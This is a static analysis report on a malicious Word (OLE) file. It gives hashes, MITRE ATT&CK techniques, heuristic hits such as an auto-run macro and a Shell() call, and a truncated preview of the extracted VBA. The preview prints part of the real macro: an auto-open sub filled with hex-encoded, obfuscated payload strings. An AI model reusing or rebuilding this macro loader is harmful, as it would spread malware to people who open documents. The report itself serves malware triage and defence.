Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 084e055be24e8af2…

MALICIOUS

Office (OLE)

98.5 KB Created: 2018-02-22 07:51:00 Authoring application: Microsoft Office Word First seen: 2019-06-27
MD5: f05e2739fc739b6ba31bd199872e4d5c SHA-1: 02bb3694cebf7af7f9c86d21ba60d30e28a7111b SHA-256: 084e055be24e8af2475fc5069b1e4b15d097622eff9a764fa50a003cbf67a918
224 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Workbook_Open macro, which is a common technique for executing malicious code upon opening. The critical heuristic firing for Shell() call in VBA indicates that the macro attempts to execute external commands. The ClamAV detection further confirms its malicious nature. The macro likely downloads and executes a second-stage payload, although the specific URL or payload is not directly extractable from the provided truncated script.

Heuristics 7

  • ClamAV: Xls.Malware.Cwsp-6735643-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Cwsp-6735643-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11228 bytes
SHA-256: d347961af119f1690398fd584b4de69ba0fa4c02b040712293acd0c327016ec2
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 38 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Sub Workbook_Open()
Dim BU_MV As String
BU_MV = "4C311D4C4C4C4C8B1B4C8A4C4C4C4C8B4C29104C8472225E855A4C4C4C474C677E4C4C4C4C68244C4C4C4C52770E5D4C4C416E694C1D80691B4C3F53424C4C582F2E274F4C4C621169114C4C4C4C834C583F4C4C3F4C6E4D644C16364C7E4C114C4C544C424C4C8B186474184C8A4B4C564"
Dim R_ES As String
R_ES = "C4C4C264C4C4C4C6A4C38414C1E4C394C4C4C5A4C4F4C4C3C624C4C6F3F7A4C4C694A4C4C2D691F524C4C2F894C4C5E7544324C4C144C394B68772E1E4C864C4C6F4C4C814C4C827848567C4C4C68234C4C4C54124C624C4C4C6E4C480E56662E8226524C4C80614C236E4C214B4C4C1B17"
Dim KM_JDY As String
KM_JDY = "4C0F8A844C846C4C4C5F4C4C3D460D234C4F4C232B4C4C4C4C4C4C5A294C4C3D85544C4C4C144C2D4C4C4C344C4C7F501B4C4C4C884C4C4C4C594C434C254C4C4C482E824C3D244C724C156F4C4C4C4C524C4C114C214C2C4C664C154C4C73114C5D4C234C4C32230D454C4C4C6A2B754C3"
Dim QTC_CZ As String
QTC_CZ = "34C43636D511E696A884C4C2F4C4C4C174C4C7D824C114C713440214C4C4C7B394C244C4C7B4C858240764C4C234C425F4C4C564C443F4C4C294C544C4C4C6D4C4C4C664C4C4C3E4C4C274C364C295F71476D4C4C4C66437F4C4C3D104C5C154C4C64754C4C4C5C5D0F296D4C314C4C4C6C"
Dim YHV_BIN As String
YHV_BIN = "4C4C7F1F394C4C66361A664C7A4C2D4C4C4C4C4C4C4C4C4C4C4C5A3D24474C4C4C4C4C8576594C4C4C4C644C4C864C4C4C184C3C4C4C4C28144C4C4C4E4C14814C4C4C29594C7F4C4C164120252F757C283C0F4C4C4C11136A6E4C4C4C4C5D48374C374C4C4C3B4518398478144C807A336"
Dim YWH_F As String
YWH_F = "A124C4C4C234C2C4C530D4C1A4C4C4C404A4C794C4C4C4C4C627F4C4A7D4C4C584C6633824C4C79574C1746774C3C0D74434C4C4C3E264C3F35874C4C4C164C717C4C544C194C494C444C4C4C692F20337F4C134C4C4C27846B4C5920334C664C874C4C4C4C78687A72194C4C873A4C1373"
Dim TC_YCN As String
TC_YCN = "8047720F9C4C8B4C432689354C833D4C5F4C34314B133D4C754C6D7F4C3E29534C4C4C4C4C527B7D25424E4C4A4C19834C4C5C4C4F42404275674C38184C114C43894C4C4A4C4E4C4C324C4C374F604C44634C74778A5F4C8B6A8C5072533D524C4C4C28464C4C1B324C1C6E534C3C4C4C1"
Dim JZ_AUW As String
JZ_AUW = "C4C4C3B4C1E634C8B5B4B4C825B4C4C4C764C454C4B244C4F4C7B4C844C3A4C77634C4C234C68894C4C0D584C4C3D4C4C4C4C4C59684C7C4C414C144C1D4C174C402C4C4C4C424C144C23804C4C4A3D4C4C74144C165C4C6E87804C254C534C4C184C174C4C524C8C4C4C4C4C8A3A4C4C4C"
Dim MI_RQT As String
MI_RQT = "4D4C4C404C4D4C4C6089334C4C644D4C4C2069554CD5784C764C4C5D4C7D534C7163257A2D444C4C4C4C566519154D764C6D4C59846738684C4D406A4C4C4C194C394C0D342E4C4C594C4C4C204C6E4C6B6E324C4C5817384C4C4C117A10693049854C8A4D4F4C4C4C387966284C4C4C4C4"
Dim AWW_K As String
AWW_K = "64C3E4C4C4C76884C4C31564C4C0F4C4C4C6F294C802F4D2D4C4C4C4B3F4C752F88184C4C4C774C5F4C4C4C4C26274C4C658B4C411C4C4C4C114C4C4C7E4C7B3F4C144C4C4C514E4C4D4C4B4C324C4C6850674C89544C4C4C27731D4C6249300D7A862E2030146D47714C4C4C4C2D4C4C4C"
Dim M_YB As String
M_YB = "406E244C4C4C4C268C4C408746114C4A624C734C45494C4C254C394C4C4C4C1F2E4C1916884C324C4C474C144C784C7F514C404C4C4C322A554C564C324C4C166E74253787404C2A4D4C0F374C3B426E4C863C614C2E334C4C4C4C51634C4C74814C604C4C1D4C234C3472304C217B4C554"
Dim S_W As String
S_W = "C4C75534C824C7F434C4C4C4C720F4C4C4C4C754A4B6E4C4C4C4C2D4C3C4C3D4C4C1D49486E37784C4C4A4C3F4C4C4C4C4C3F4C274C738413593C4C5F4A4C104C264C614C7E4C4C2A4C0E4C4C1C167C4C4C4C47234C694C424C3F544C588A4C4C7B4C4C454C4C234C214C835E4C2D4C2C4C"
Dim GK_MHO As String
GK_MHO = "4E4C4C6B874C4C4C5A5B4D8C127918658366444C7D5730264C86304C771E7A4C89484C4C4C4742895316714C4C4C1652394C4C4C304C6D4C4C4C0E4C4C24494C0F4C374C49304C72734C686A1E4C264C4B754C4C66774C49394C414C4C354C454C224C274C796A3A4C788756444C738B1B4"
Dim A_HMC As String
A_HMC = "C4C4C6C4C4C784C4C4C4C814C81318C4C4C4C4C4C4C4C4C4C1A4C4C4C4C724C25614C4C39364C7B624C4C4C4C1F334C4C3D4C70131A6D4C4C834C2D7F4C68764C4C4C4C19644C572E5E4C155D2A4C4C880D4C8A4C4C4C624C3D4C4C5A4C6062844C1E4C404C4C4E4C71644C4C36404C4B80"
Dim QE_ML As String
QE_ML = "4C4C254C8781334C854C7B4C7A4C4C78334C4C454C5C4C824C4C5E2B4C274C803474736B4C75194C207A537B4C22360
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.